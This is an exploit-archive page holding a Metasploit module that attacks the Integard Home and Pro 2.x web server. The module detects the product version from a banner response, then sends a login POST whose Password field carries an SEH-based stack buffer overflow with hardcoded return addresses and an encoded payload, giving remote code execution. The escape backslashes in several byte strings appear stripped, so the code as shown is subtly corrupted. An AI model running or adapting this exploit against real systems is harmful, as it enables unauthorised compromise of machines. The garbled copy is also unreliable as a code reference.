Integard Home and Pro v2 Remote HTTP Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Integard Home and Pro v2 Remote HTTP Buffer Overflow Exploit
# Published : 2010-09-07
# Author : Lincoln, Nullthreat, rick2600
# Previous Title : MOAUB #8 - Microsoft Office Visio DXF File Stack based Overflow
# Next Title : YOPS Web Server Remote Command Execution

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Integard Home/Pro version 2.0',
			'Description'    => %q{
					Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
			},
			'Author'  =>
				[
					'Lincoln',
					'Nullthreat',
					'rick2600',
				],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision: $',
			'References'    =>
				[
					['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 2000,
					'BadChars'  => "x00x20x26x2fx3dx3fx5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Privileged'     => false,
			'Targets'        =>
				[
					[ 'Automatic Targeting',          { 'auto' => true }],
					[ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
					[ 'Integard Pro  2.2.0.9026', { 'Ret' => 0x0040362C,}],
				],
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(18881)
			], self.class )
	end

	#Current version does not work with bind() type of payloads
	#meterpreter, windows/exec  etc works fine

	def exploit
		mytarget = target
		if(target['auto'])
			mytarget = nil
			print_status("[*] Automatically detecting the target...")
			connect
			get = "GET /banner.jpg HTTP/1.1rnrn"
			sock.put(get)
			data = sock.recv(1024)
				if (data =~ /Content-Length: 24584/)
					print_status("[!] Found Version - Integard Home")
					mytarget = self.targets[1]
				end
				if (data =~ /Content-Length: 23196/)
					print_status("[!] Found Version - Integard Pro")
					mytarget = self.targets[2]
				end
			sock.close
		end
		connect
		print_status("[!] Selected Target: #{mytarget.name}")
		print_status("[*] Building Buffer")
		pay = payload.encoded
		junk = rand_text_alpha_upper(3091 - pay.length)
		jmp = "xE9x2BxF8xFFxFF"
		nseh = "xEBxF9x90x90"
		seh = [mytarget.ret].pack('V')
		buffer = junk + pay + jmp + nseh + seh
		print_status("[*] Sending Request")
		req = "POST /LoginAdmin HTTP/1.1rn"
		req << "Host: 192.168.2.129:18881rn"
		req << "Content-Length: 1074rnrn"
		req << "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
		sock.put(req)
		print_status("[*] Request Sent")
		sock.close
		handler
	end
end